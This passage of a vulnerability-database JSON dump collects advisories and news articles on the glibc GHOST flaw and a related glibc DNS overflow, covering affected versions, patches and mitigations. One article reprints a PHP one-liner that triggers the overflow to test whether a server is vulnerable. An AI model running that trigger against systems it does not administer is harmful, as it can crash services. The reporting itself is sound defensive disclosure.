php54-imap-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-snmp-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-debuginfo-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-gd-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-tidy-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-fpm-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-xmlrpc-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-embedded-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-process-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-cli-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-pgsql-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mysqlnd-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-soap-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-xml-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mbstring-5.4.38-1.66.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-0235](<https://access.redhat.com/security/cve/CVE-2015-0235>), [CVE-2015-0273](<https://access.redhat.com/security/cve/CVE-2015-0273>)\n\nMitre: [CVE-2015-0235](<https://vulners.com/cve/CVE-2015-0235>), [CVE-2015-0273](<https://vulners.com/cve/CVE-2015-0273>)\n", "cvss3": {}, "published": "2015-03-13T10:00:00", "type": "amazon", "title": "Critical: php54", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2015-03-13T10:03:00", "id": "ALAS-2015-493", "href": "https://alas.aws.amazon.com/ALAS-2015-493.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:34", "description": "[](<https://4.bp.blogspot.com/-n9qRyLyEnTk/VMhH-B1pR3I/AAAAAAAAhoo/hhqRYQ4ynzs/s728/ghost-linux-security-vulnerability.png>)\n\nA highly critical vulnerability has been unearthed in the **GNU C Library (glibc)**, a widely used component of most Linux distributions, that could allow attackers to execute malicious code on servers and remotely gain control of Linux machines.\n\n \n\n\nThe vulnerability, dubbed \"**GHOST**\" and assigned _[CVE-2015-0235](<http://seclists.org/oss-sec/2015/q1/283>)_, was discovered and disclosed by the security researchers from Redwood Shores, California-based security firm Qualys on Tuesday.\n\n \n\n\n**CRITICAL AS HEARTBLEED AND SHELLSHOCK**\n\nGHOST is considered to be critical because hackers could exploit it to silently gain complete control of a targeted Linux system without having any prior knowledge of system credentials (i.e. administrative passwords). \n \n**Also Read: **[Top Best Password Managers](<https://thehackernews.com/2016/07/best-password-manager.html>).\n\n \n\n\nThe flaw represents an immense Internet threat, in some ways similar to the **[Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>),** **[Shellshock](<https://thehackernews.com/2014/09/Shellshock-Bash-Vulnerability-exploit.html>) **and** [Poodle](<https://thehackernews.com/2014/10/poodle-ssl-30-attack-exploits-widely_14.html>) **bugs that came to light last year.\n\n \n\n\n**WHY GHOST ?**\n\nThe vulnerability in the GNU C Library (glibc) is dubbed GHOST because it can be triggered by the library's _gethostbyname family of functions_. Glibc is a repository of open-source software written in the C and C++ coding languages that defines system calls.\n\n \n\n\nThe problem actual originates from a heap-based buffer overflow found in the **___nss_hostname_digits_dots()_** function in glibc. This function is especially invoked by the **_gethostbyname **and** gethostbyname2() **function calls.\n\n \n\n\nAccording to the researchers, a remote attacker has ability to call either of these functions which could allow them to exploit the vulnerability in an effort to execute arbitrary code with the permissions of the user running the application.\n\n \n\n\n**EXPLOIT CODE**\n\nIn an attempt to highlight the severity of the risk, security researchers were able to write proof-of-concept exploit code that is capable to carry out a full-fledged remote code execution attack against the [Exim mail server](<http://exim.org/>). \n \n**Also Read:** [Deep Web Search Engines](<https://thehackernews.com/2016/02/deep-web-search-engine.html>).\n\n \n\n\nThe researcher\u2019s exploit able to bypass all existing exploit protections (like ASLR, PIE and NX) available on both 32-bit and 64-bit systems, including position independent executions, address space layout randomization and no execute protections.\n\n \n\n\nUsing the exploit, an attacker is able to craft malicious emails that could automatically compromise a vulnerable server without the email even being opened, according to Amol Sarwate, director of engineering with Qualys.\n\n \n\n\nSo far, the company has not published the exploit code to the public but eventually it plans to make the exploit available as a Metasploit module.\n\n \n\n\n**VERSIONS AFFECTED**\n\nThe vulnerability affects versions of glibc as far back as glibc-2.2, which was released in 2000.\n\n> \"Unfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are): Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example,\" researchers from Qualys said in an [advisory](<http://www.openwall.com/lists/oss-security/2015/01/27/9>) published Tuesday.\n\n**FIXES AVAILABLE FOR SOME LINUX DISTRIBUTIONS**\n\nHowever, major distributors of the Linux operating system, including **[Red Hat](<https://rhn.redhat.com/errata/RHSA-2015-0090.html>)**, **[Debian](<https://security-tracker.debian.org/tracker/CVE-2015-0235>)** and **[Ubuntu](<https://launchpad.net/ubuntu/+source/eglibc>)**, updated their software on Tuesday to thwart the serious cyber threat. In order to update systems, core functions or the entire affected server reboot is required.\n\n \n\n\nRed Hat, the No. 1 provider of Linux software to businesses, recommends its customers to update their systems _\"as soon as possible to mitigate any potential risk.\"_\n", "cvss3": {}, "published": "2015-01-27T21:17:00", "type": "thn", "title": "Critical GHOST vulnerability affects most Linux Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2016-08-04T08:10:47", "id": "THN:A649F4ABCE9B99052139693A13D95B14", "href": "https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:33", "description": "[](<https://3.bp.blogspot.com/-4Dia-n2xwzc/VMtiJcqIwVI/AAAAAAAAhqc/bAafPBMQ_gw/s1600/ghost-glibc-vulnerabilitywordPress.jpg>)\n\nAfter the disclosure of extremely critical **[GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) in the GNU C library (glibc)** \u2014 a widely used component of most Linux distributions, security researchers have discovered that PHP applications, including the _**[WordPress](<https://thehackernews.com/search/label/WordPress>) **_Content Management System (CMS), could also be affected by the bug.\n\n \n\n\n\"**GHOST**\" is a serious vulnerability (_CVE-2015-0235_), announced this week by the researchers of California-based security firm Qualys, that involves a heap-based buffer overflow in the glibc function name - \"GetHOSTbyname().\" Researchers said the vulnerability has been present in the glibc code since 2000.\n\n \n\n\nThough the major Linux distributors such as **Red Hat**, **Debian** and** Ubuntu**, have already updated their software against the flaw, GHOST could be used by hackers against only a handful of applications currently to remotely run executable code and silently gain control of a Linux server. \n\n \n\n\nAs we explained in our previous article, heap-based buffer overflow was found in ___nss_hostname_digits_dots()_ function, which is particularly used by the **gethostbyname()** and **gethostbyname2()** glibc function call. \n\n \n\n\nSince, PHP applications including WordPress also use the **_gethostbyname() function wrapper_**, the chance of the critical vulnerability becomes higher even after many Linux distributions issued fixes.\n\n \n\n\n**GHOST - BIG ISSUE FOR WORDPRESS**\n\nAccording to the Sucuri researcher Marc-Alexandre Montpas, GHOST vulnerability could be a big issue for WordPress CMS, as it uses **wp_http_validate_url()** function to validate every pingback post URL.\n\n> \"._...And it does so by using gethostbyname(),_\" wrote Montpas in an [advisory](<http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html>) published Wednesday. \"_So an attacker could leverage this vector to insert a malicious URL that would trigger a buffer overflow bug, server-side, potentially allowing him to gain privileges on the server._\"\n\nThe vulnerability affects all versions of glibc from glibc-2.17 and lower. However, it was patched in glibc-2.18 in May 2013, but was not marked as a security vulnerability so the fix did not make it into many common Linux distributions like RedHat and Ubuntu.\n\n \n\n\n**HOW TO CHECK YOUR SYSTEM AGAINST GHOST FLAW**\n\n> _\"This is a very critical vulnerability and should be treated as such,\"_ Montpas said._ \"If you have a dedicated server (or VPS) running Linux, you have to make sure you update it right away.\"_\n\nSucuri also provided the following test PHP code, which an admin can run on their server terminal. If the code returns a segmentation fault, then your Linux server is vulnerable to the GHOST vulnerability.\n\n> _php -r '$e=\"0\u2033;for($i=0;$i<2500;$i++){$e=\"0$e\";} gethostbyname($e);' Segmentation fault_\n\n**HOW TO PROTECT**\n\nUntil now, Debian 7, Red Hat Enterprise Linux 6 and 7, CentOS 6 and 7 and Ubuntu 12.04 have released software updates. So users of above Linux distributions are recommended to patch their systems, followed by a system reboot, as soon as possible. \n\n * **Disable XML-RPC **\nIf you don\u2019t want to use XML-RPC process, it is possible to disable it altogether. There are even [Wordpress plugins](<https://wordpress.org/plugins/prevent-xmlrpc/>) that will totally disable XML-RPC process. \n\n\n * **Disable Pingback Requests **\nYou may also disable the pingback feature by adding the following code to your **functions.php file**: \n\n\n> _add_filter( 'xmlrpc_methods' , function( $methods' ) { unset( $methods[ 'pingback.ping ] ); return $methods; } );_\n", "cvss3": {}, "published": "2015-01-29T23:53:00", "type": "thn", "title": "GHOST glibc Vulnerability Affects WordPress and PHP applications", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-30T10:53:39", "id": "THN:3DD8F9ADFFEB290F33825414D41B0F41", "href": "https://thehackernews.com/2015/01/ghost-linux-security-vulnerability_29.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:54", "description": "[](<https://3.bp.blogspot.com/-_4EpHCqniVA/VsQtYB5WSwI/AAAAAAAAmuc/xFGkZE8C85Q/s1600/glibc-linux-flaw.png>)\n\nA highly critical vulnerability has been uncovered in the **GNU C Library (glibc)**, a key component of most Linux distributions, that leaves nearly all Linux machines, thousands of apps and electronic devices vulnerable to hackers that can take full control over them.\n\n \n\n\nJust clicking on a link or connecting to a server can result in remote code execution (RCE), allowing hackers to steal credentials, spy on users, seize control of computers, and many more.\n\n \n\n\nThe vulnerability is similar to the last year's [GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) (CVE-2015-0235) that left countless machines vulnerable to_ remote code execution (RCE) attacks_, representing a major Internet threat.\n\n \n\n\nGNU C Library (glibc) is a collection of open source code that powers thousands of standalone apps and most Linux distributions, including those distributed to routers and other types of hardware.\n\n \n\n\nThe recent flaw, which is indexed as _CVE-2015-7547_, is a **stack-based buffer overflow** vulnerability in glibc's DNS client-side resolver that is used to translate human-readable domain names, like google.com, into a network IP address.\n\n \n\n\nThe buffer overflow flaw is triggered when the _getaddrinfo() library function_ that performs domain-name lookups is in use, allowing hackers to remotely execute malicious code.\n\n \n\n\n### How Does the Flaw Work?\n\n \n\n\nThe flaw can be exploited when an affected device or app make queries to a malicious DNS server that returns too much information to a lookup request and floods the program's memory with code.\n\n \n\n\nThis code then compromises the vulnerable application or device and tries to take over the control over the whole system.\n\n \n\n\nIt is possible to inject the domain name into server log files, which when resolved will trigger remote code execution. An SSH (Secure Shell) client connecting to a server could also be compromised.\n\n \n\n\nHowever, an attacker need to bypass several operating system security mechanisms \u2013 _like ASLR and non-executable stack protection _\u2013 in order to achieve successful RCE attack.\n\n \n\n\nAlternatively, an attacker on your network could perform **man-in-the-middle **(MitM) attacks and tamper with DNS replies in a view to monitoring and manipulating (injecting payloads of malicious code) data flowing between a vulnerable device and the Internet.\n\n \n\n\n### Affected Software and Devices\n\n \n\n\nAll versions of glibc after 2.9 are vulnerable. Therefore, any software or application that connects to things on a network or the Internet and uses glibc is at RISK.\n\n \n\n\nThe widely used SSH, sudo, and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications or code is almost too diverse and numerous to enumerate completely.\n\n \n\n\nThe vulnerability could extend to a nearly all the major software, including:\n\n * Virtually all distributions of Linux.\n * Programming languages such as the Python, PHP, and Ruby on Rails.\n * Many others that use Linux code to lookup the numerical IP address of an Internet domain.\n * Most Bitcoin software is [reportedly vulnerable](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>), too.\n\n \n\n\n### Who are Not Affected\n\n \n\n\nThe good news is users of Google's Android mobile operating system aren't vulnerable to this flaw. As the company uses a glibc substitute known as Bionic that is not susceptible, according to a Google representative.\n\n \n\n\nAdditionally, a lot of embedded Linux devices, including home routers and various gadgets, are not affected by the bug because these devices use the **uclibc** library as it is more lightweight than hefty glibc.\n\n \n\n\nThe vulnerability was first introduced in May 2008 but was [reported](<https://sourceware.org/bugzilla/show_bug.cgi?id=18665>) to the glibc maintainers July 2015.\n\n \n\n\nThe vulnerability was discovered independently by researchers at **Google** and **Red Hat**, who found that the vulnerability has likely not been publicly attacked.\n\n \n\n\nThe flaw was discovered when one of the Google's SSH apps experienced a severe error called a segmentation fault each time it attempted to contact to a particular Internet address, Google's security team reported in a [blog post](<https://googleonlinesecurity.blogspot.ca/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>) published Monday.\n\n \n\n\n### Where glibc went Wrong\n\n \n\n\nGoogle researchers figured out that the error was due to a buffer overflow bug inside the glibc library that made malicious code execution attacks possible. The researchers then notified glibc maintainers.\n\n \n\n\nHere's what went wrong, according to the Google engineers:\n\n \n\n\n> \"glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\" \n \n\"Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\"\n\n \n\n\n#### _Proof-of-Concept Exploit Released_\n\nGoogle bod Fermin J. Serna released a [Proof-of-Concept](<https://github.com/fjserna/CVE-2015-7547>) (POC) exploit code on Tuesday.\n\n \n\n\nWith this POC code, you can verify if you are affected by this critical issue, and verify any mitigations you may wish to enact.\n\n \n\n\n### Patch glibc Vulnerability\n\n \n\n\nGoogle researchers, working with security researchers at Red Hat, have [released a patch](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) to fix the programming blunder.\n\n \n\n\nHowever, it is now up to the community behind the Linux OS and manufacturers, to roll out the patch to their affected software and devices as soon as possible.\n\n \n\n\nFor people running servers, fixing the issue will be a simple process of downloading and installing the patch update.\n\n \n\n\nBut for other users, patching the problem may **not be so easy**. The apps compiled with a vulnerable glibc version should be recompiled with an updated version \u2013 a process that will take time as users of affected apps have to wait for updates to become available from developers.\n\n \n\n\nMeanwhile, you can help prevent exploitation of the flaw, if you aren\u2019t able to immediately patch your instance of glibc, by limiting all TCP DNS replies to 1024 bytes, and dropping UDP DNS packets larger than 512 bytes.\n\n \n\n\nFor more in-depth information on the glibc flaw, you can read Red Hat [blog post](<https://access.redhat.com/errata/RHSA-2016:0175>).\n", "cvss3": {}, "published": "2016-02-16T21:27:00", "type": "thn", "title": "Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0235", "CVE-2015-7547"], "modified": "2016-02-17T08:27:51", "id": "THN:ACBFC80659E47A5B7C81B99570749679", "href": "https://thehackernews.com/2016/02/glibc-linux-flaw.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vulnerlab": [{"lastseen": "2019-05-29T17:28:54", "description": "", "cvss3": {}, "published": "2015-01-30T00:00:00", "type": "vulnerlab", "title": "Glibc Ghost Vulnerability (CVE-2015-0235) - How to Secure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-30T00:00:00", "id": "VULNERLAB:1430", "href": "http://www.vulnerability-lab.com/get_content.php?id=1430", "sourceData": "Document Title:\r\n===============\r\nGlibc Ghost Vulnerability (CVE-2015-0235) - How to Secure\r\n\r\n\r\nReferences:\r\n===========\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1430\r\n\r\nDownload: http://www.vulnerability-lab.com/resources/documents/1430.pdf\r\n\r\n\r\n\r\nRelease Date:\r\n=============\r\n2015-01-30\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1430\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nReport\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHigh\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nThe GNU C Library or glibc is an implementation of the standard C library and a core part of the Linux operating system. Without this library a \r\nLinux system will not function. The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control \r\nof the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue.\r\n\r\nThe paper explains the vulnerability in the linux system and demonstrates how to prevent a local or remote compromise.\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nRajivarnan R. [Security Researcher] - Akati Consulting Pvt Ltd \r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed \r\nor implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable \r\nin any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab \r\nor its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for \r\nconsequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \r\npolicies, deface websites, hack into databases or trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t \t\t- www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t \t\t- admin@evolution-sec.com\r\nSection: magazine.vulnerability-db.com\t- vulnerability-lab.com/contact.php\t\t \t- evolution-sec.com/contact\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t \t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php \t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php\t- vulnerability-lab.com/register/\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \r\nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \r\nis trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact \r\n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2015 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-20T08:09:26", "description": "", "cvss3": {}, "published": "2015-01-30T00:00:00", "type": "vulnerlab", "title": "Glibc Ghost Vulnerability (CVE-2015-0235) - How to Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-30T00:00:00", "id": "VULNERABLE:1430", "href": "https://www.vulnerability-lab.com/get_content.php?id=1430", "sourceData": "Document Title:\r\n===============\r\nGlibc Ghost Vulnerability (CVE-2015-0235) - How to Secure\r\n\r\n\r\nReferences:\r\n===========\r\nhttps://www.vulnerability-lab.com/get_content.php?id=1430\r\n\r\nDownload: https://www.vulnerability-lab.com/resources/documents/1430.pdf\r\n\r\n\r\n\r\nRelease Date:\r\n=============\r\n2015-01-30\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1430\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nReport\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHigh\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nThe GNU C Library or glibc is an implementation of the standard C library and a core part of the Linux operating system. Without this library a \r\nLinux system will not function. The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control \r\nof the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue.\r\n\r\nThe paper explains the vulnerability in the linux system and demonstrates how to prevent a local or remote compromise.\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nRajivarnan R. [Security Researcher] - Akati Consulting Pvt Ltd \r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed \r\nor implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable \r\nin any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab \r\nor its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for \r\nconsequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \r\npolicies, deface websites, hack into databases or trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t \t\t- www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t \t\t- admin@evolution-sec.com\r\nSection: magazine.vulnerability-db.com\t- vulnerability-lab.com/contact.php\t\t \t- evolution-sec.com/contact\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t \t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php \t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php\t- vulnerability-lab.com/register/\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \r\nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \r\nis trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact \r\n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2015 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "paloalto": [{"lastseen": "2021-07-28T14:33:13", "description": "The open source library \u201cglibc\u201d has been found to contain a recently discovered vulnerability (CVE-2015-0235, commonly referred to as \u201cGHOST\u201d) that has been demonstrated to enable remote code execution in some software. Palo Alto Networks software makes use of the vulnerable library, however there is no known exploitable condition in PAN-OS software enabled by this vulnerability at the time of this advisory. An update to PAN-OS will be made available that addresses CVE-2015-0235 in a regularly scheduled software maintenance update. (Ref # 74443)\nThe exploitability of CVE-2015-0235 on vulnerable systems is highly dependent on the architecture and design surrounding use of the vulnerable functions within the system, and exploitable conditions found across various open source software libraries have so far been exceedingly rare. At the time of this advisory, Palo Alto Networks is not aware of any specific remotely exploitable condition enabled by this vulnerability that affects any Palo Alto Networks products.\nThis issue affects PAN-OS versions prior to PAN-OS 7.0.1\n\n**Work around:**\nN/A", "cvss3": {}, "published": "2015-02-02T08:00:00", "type": "paloalto", "title": "GHOST: glibc vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2015-02-02T08:00:00", "id": "PAN-SA-2015-0002", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2015-0235", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:32:32", "description": "<p>\u8fd1\u65e5\u56fd\u5916\u5b89\u5168\u7814\u7a76\u4eba\u5458\u62ab\u9732\u4e00\u4e2a\u5728 Linux Glibc \u5e93\u4e0a\u53d1\u73b0\u7684\u4e25\u91cd\u7684\u5b89\u5168\u95ee\u9898\uff0c\u5b83\u53ef\u4ee5\u8ba9\u653b\u51fb\u8005\u5728\u672c\u5730\u6216\u8005\u8fdc\u7a0b\u83b7\u53d6\u64cd\u4f5c\u7cfb\u7edf\u7684\u63a7\u5236\u6743\u9650\uff0c\u7f16\u53f7\u4e3a#CVE-2015-0235#\uff0c\u547d\u540d\u4e3a\u5e7d\u7075\uff08GHOST\uff09\u6f0f\u6d1e\u3002</p><p>\u4ec0\u4e48\u662fGHOST?\u4e3a\u4ec0\u4e48\u547d\u540d\u4e3aGHOST\uff1f</p><p>\u6f0f\u6d1e\u6700\u65e9\u8d77\u6e90\u4e8e:</p><p>The first vulnerable version of the GNU C Library is glibc-2.2, released on November 10, 2000.</p><p>\u201cDuring a code audit performed internally at Qualys, we discovered a buffer overflow in</p><p>the __nss_hostname_digits_dots() function of the GNU C Library (glibc).</p><p>This bug is reachable both locally and remotely via the gethostbyname*() functions, so we decided to analyze it<br>and its impact thoroughly, and named this vulnerability \"GHOST\".\u201d</p><p>\u5f15\u7528\u90e8\u5206\u5927\u81f4\u610f\u601d\uff1a\u201c\u6f0f\u6d1e\u51fa\u73b0\u5728GNU C \u51fd\u6570\u5e93\uff08glibc\uff09\uff0c\u53d7\u5f71\u54cd\u7684\u51fd\u6570gethostbyname*()\uff0c\u547d\u540d\u4e3a\uff1aGHOST\u201d</p><p><strong>\u4ec0\u4e48\u662fglibc</strong></p><p>glibc \u662f GNU \u53d1\u5e03\u7684 libc \u5e93\uff0c\u5373 c \u8fd0\u884c\u5e93\u3002glib c\u662f Linux \u7cfb\u7edf\u4e2d\u6700\u5e95\u5c42\u7684 API\uff0c\u51e0\u4e4e\u5176\u5b83\u4efb\u4f55\u8fd0\u884c\u5e93\u90fd\u4f1a\u4f9d\u8d56\u4e8e glibc\u3002glibc \u9664\u4e86\u5c01\u88c5 Linux \u64cd\u4f5c\u7cfb\u7edf\u6240\u63d0\u4f9b\u7684\u7cfb\u7edf\u670d\u52a1\u5916\uff0c\u5b83\u672c\u8eab\u4e5f\u63d0\u4f9b\u4e86\u8bb8\u591a\u5176\u5b83\u4e00\u4e9b\u5fc5\u8981\u529f\u80fd\u670d\u52a1\u7684\u5b9e\u73b0\u3002glibc \u56ca\u62ec\u4e86\u51e0\u4e4e\u6240\u6709\u7684 UNIX \u901a\u884c\u7684\u6807\u51c6\u3002</p><p><strong>\u6f0f\u6d1e\u5371\u5bb3\uff1a</strong></p><p>\u672c\u5730\u4e0e\u8fdc\u7a0b\u90fd\u53d7\u5f71\u54cd\uff0c\u53ef\u4ee5\u8ba9\u653b\u51fb\u8005\u5728\u672c\u5730\u6216\u8005\u8fdc\u7a0b\u83b7\u53d6\u64cd\u4f5c\u7cfb\u7edf\u7684\u63a7\u5236\u6743\u9650\u3002</p><p><strong>\u53d7\u5f71\u54cd\u7248\u672c\uff1a</strong></p><p>glibc-2.2 \u4e0e glibc-2.17 \u4e4b\u95f4\u7684\u7248\u672c</p><p>glibc \u76842.18\uff08\u53d1\u5e03\u65e5\u671f\uff1a2013\u5e748\u670812\u65e5\uff09\u5df2\u7ecf\u5df2\u8fdb\u884c\u4e86\u6f0f\u6d1e\u4fee\u590d\uff08\u8865\u4e01\u53d1\u5e03\u65f6\u95f4\uff1a2013\u5e745\u670821\u65e5\uff09</p><p><strong>\u53d7\u5f71\u54cd\u5e73\u53f0\uff1a</strong></p><p><strong> <img 